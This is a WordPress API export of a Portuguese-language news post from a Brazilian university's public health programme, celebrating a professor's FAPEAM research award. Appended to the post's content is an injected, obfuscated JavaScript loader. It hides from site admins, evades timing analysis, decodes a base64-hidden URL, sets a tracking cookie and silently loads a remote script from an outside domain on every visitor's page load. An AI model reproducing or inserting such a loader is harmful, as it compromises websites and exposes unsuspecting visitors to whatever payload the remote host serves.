{"id":1010,"date":"2025-01-28T17:00:00","date_gmt":"2025-01-28T20:00:00","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1010"},"modified":"2026-04-16T13:18:12","modified_gmt":"2026-04-16T16:18:12","slug":"premio-pesquisar-da-fapeam","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/01\/28\/premio-pesquisar-da-fapeam\/","title":{"rendered":"Pr\u00eamio Pesquisar da FAPEAM"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/POSTS-PPGSC-UEA-2025-8-1-819x1024.png\" alt=\"\" class=\"wp-image-1014\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/POSTS-PPGSC-UEA-2025-8-1-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/POSTS-PPGSC-UEA-2025-8-1-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/POSTS-PPGSC-UEA-2025-8-1-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/POSTS-PPGSC-UEA-2025-8-1.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>\ud83c\udf1f Com muito orgulho, celebramos a conquista do professor Dr. Andr\u00e9 Luiz Machado das Neves, docente do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva (PPGSC) da Universidade do Estado do Amazonas (UEA), que recebeu o Pr\u00eamio Pesquisador Destaque da FAPEAM! \ud83c\udfc6<\/p>\n\n\n\n<p>Esse reconhecimento reflete sua excel\u00eancia acad\u00eamica e as contribui\u00e7\u00f5es cient\u00edficas significativas no campo da sa\u00fade coletiva.<\/p>\n\n\n\n<p>\ud83d\udc68\u200d\ud83c\udf93 Doutor em Sa\u00fade Coletiva pela UERJ, com foco em Ci\u00eancias Humanas e Sociais na Sa\u00fade, o professor Andr\u00e9 \u00e9 refer\u00eancia em pesquisas etnogr\u00e1ficas e socioantropol\u00f3gicas, explorando temas como sa\u00fade do corpo, movimentos sociais e preven\u00e7\u00e3o ao HIV. Ele tamb\u00e9m coordena o N\u00facleo de Estudos Psicossociais sobre Direitos Humanos e Sa\u00fade (NEPDS), \u00e9 bolsista de produtividade pela FAPEAM e atua no Programa de P\u00f3s-Gradua\u00e7\u00e3o em Psicologia da UFAM.<\/p>\n\n\n\n<p>Al\u00e9m disso, o professor Andr\u00e9 integra o doutorado em Sa\u00fade P\u00fablica na Amaz\u00f4nia (UEA, UFAM e Fiocruz), refor\u00e7ando seu compromisso com a ci\u00eancia e a forma\u00e7\u00e3o de novos pesquisadores na regi\u00e3o amaz\u00f4nica. \ud83c\udf31<\/p>\n\n\n\n<p>Parabenizamos o professor Andr\u00e9 por mais essa conquista que fortalece a ci\u00eancia na Amaz\u00f4nia e inspira toda a comunidade acad\u00eamica. \ud83d\udc4f\u2728<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"800\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/image-1.png\" alt=\"\" class=\"wp-image-1011\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/image-1.png 640w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/03\/image-1-240x300.png 240w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/figure>\n\n\n\n<p><\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udf1f Com muito orgulho, celebramos a conquista do professor Dr. Andr\u00e9 Luiz Machado das Neves, docente do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva (PPGSC) da Universidade do Estado do Amazonas (UEA), que recebeu o Pr\u00eamio Pesquisador Destaque da FAPEAM! \ud83c\udfc6 Esse reconhecimento reflete sua excel\u00eancia acad\u00eamica e as contribui\u00e7\u00f5es cient\u00edficas significativas no campo da sa\u00fade [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1013,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1010","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1010"}],"version-history":[{"count":3,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1010\/revisions"}],"predecessor-version":[{"id":1345,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1010\/revisions\/1345"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1013"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1010"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}